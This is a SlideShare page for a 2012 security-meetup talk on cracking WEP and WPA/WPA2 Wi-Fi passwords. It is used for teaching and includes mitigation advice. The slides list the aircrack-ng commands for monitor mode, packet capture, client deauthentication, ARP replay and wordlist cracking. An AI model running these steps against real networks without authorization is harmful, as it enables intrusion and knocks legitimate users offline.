Feb-8-2012-Breaking-Wireless-Security

2,525 views

Published on

Presentation I gave at DC207's regular meeting hosted at BlueTarp Financial (https://www.bluetarp.com).

The presentation is a quick overview to a group of industry professionals and university students (many of who have never done anything like this) of using the aircrack-ng suite of tools to crack WEP and WPA passwords. A sandboxed wireless network was setup and live demonstrations were done.

Published in: Technology
1 Comment
1 Like
Statistics
Notes
  • very strong password breaker
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total views
2,525
On SlideShare
0
From Embeds
0
Number of Embeds
90
Actions
Shares
0
Downloads
92
Comments
1
Likes
1
Embeds 0
No embeds

No notes for slide

Feb-8-2012-Breaking-Wireless-Security

  1. 1. Breaking Wireless Security cracking WEP & WPA presented by Casey DC207
  2. 2. what we're covering <ul><li>Using aircrack-ng suite to </li><ul><li>capture wireless traffic
  3. 3. retrieve WEP password
  4. 4. retrieve WPA/WPA2 passwords </li></ul></ul>
  5. 5. what we're not covering <ul><li>cryptographic specifics
  6. 6. in depth packet analysis
  7. 7. brute forcing WPS (Wi-Fi Protected Setup) </li><ul><li>time </li></ul></ul>
  8. 8. t00ls <ul><li>BackTrack Linux
  9. 9. Aircrack-ng
  10. 10. ALFA Wireless USB Adapter </li><ul><li>(Model AWUS036H) </li></ul></ul>
  11. 11. Yay! BlueTarp!
  12. 12. WEP <ul><li>Wired Equivalent Privacy (WEP)
  13. 13. Sept. 1999 in original 802.11 standard
  14. 14. uses an RC4 Stream Cipher
  15. 15. crypto is inherently flawed
  16. 16. deprecated in 2004 in favor of WPA2
  17. 17. still available on routers today </li></ul>
  18. 18. WEP encryption <ul><li>RC4 cipher uses Key + IV (Initial Values)
  19. 19. august 2001, Scott Fluhrer, Itsik Mantin, and Adi Shamir
  20. 20. passive attack to recover Key
  21. 21. need a busy network or a way to produce enough traffic
  22. 22. with enough IVs can calculate the Key </li></ul>
  23. 23. cracking WEP <ul><li>place card in monitor mode </li><ul><li># airmon-ng start wlan0 </li></ul><li>capture packets to the desired AP </li><ul><li># airodump-ng mon0 –bssid bssid –channel c –write crackme </li></ul><li>wait for an authorized client to connect </li><ul><li>can also deauthorize clients </li><ul><li># aireplay-ng -0 5 -a bssid mon0 </li></ul></ul><li>spoof ARP responses to generate more traffic </li><ul><li># aireplay-ng -3 -b bssid -h client_mac mon0 </li></ul><li>use aircrack-ng to crack the key </li><ul><li># aircrack-ng crackme.cap </li></ul></ul>
  24. 24. DEMO
  25. 25. WEP cracking mitigation <ul><li>none.
  26. 26. don't use.
  27. 27. password complexity DOES NOT MATTER </li></ul>
  28. 28. WPA <ul><li>Wi-Fi Protected Access
  29. 29. WPA became available in 1999
  30. 30. uses TKIP encryption algorithm
  31. 31. intermediate step until WPA2 </li></ul>
  32. 32. WPA2 <ul><li>WPA2 available in 2004
  33. 33. uses CCMP-AES encryption
  34. 34. WPA-Personal PSK (Pre-Shared Key) </li><ul><li>home/small office use </li></ul><li>WPA-Enterprise </li><ul><li>Requires a RADIUS server for authentication </li></ul></ul>
  35. 35. WPA encryption <ul><li>encryption based on AES
  36. 36. no known public exploits that attacks the crypto
  37. 37. brute force attack
  38. 38. uses SSID of network as part of encryption
  39. 39. precomputation is much harder </li></ul>
  40. 40. Yay! BlueTarp!
  41. 41. cracking WPA / WPA2 <ul><li>place card in monitor mode </li><ul><li># airmon-ng start wlan0 </li></ul><li>capture packets to the desired AP </li><ul><li># airodump-ng mon0 –bssid bssid –channel c –write crackme </li></ul><li>capture handshake from connecting client </li><ul><li>can force clients to deauth to capture it </li><ul><li># aireplay-ng -0 5 -a bssid mon0 </li></ul></ul><li>use aircrack-ng to try and brute force key </li><ul><li>requires a good wordlist </li><ul><li># aircrack-ng crackeme.cap -w wordlist </li></ul></ul></ul>
  42. 42. DEMO
  43. 43. WPA cracking mitigation <ul><li>use a password >= 15 characters
  44. 44. don't use a name in the top 1000 SSID list
  45. 45. disable WPS! </li></ul>
  46. 46. WPS <ul><li>Wi-Fi Protected Setup
  47. 47. attempt at easy secure access
  48. 48. wanted to make it easy to add new devices
  49. 49. almost universally enabled on new routers
  50. 50. completely fails to brute force attack </li><ul><li>revealed in December 2011
  51. 51. get the WPS pin, use it to retrieve the PSK </li></ul><li>when enabled renders WPA/WPA2 useless
  52. 52. linksys routers still vulnerable with WPS disabled </li></ul>
  53. 53. Thanks for coming! Thank you Jon and BlueTarp for hosting and food! Questions? Help? [email_address] @CaseyDunham dc207.org @DCG207
  54. 54. resources <ul><li>BackTrack Linux backtrack-linux.org
  55. 55. Aircrack-ng aircrack-ng.org
  56. 56. ALFA Networks alfa.com.tw
  57. 57. DC207 dc207.org
  58. 58. BlueTarp bluetarp.com </li></ul>

×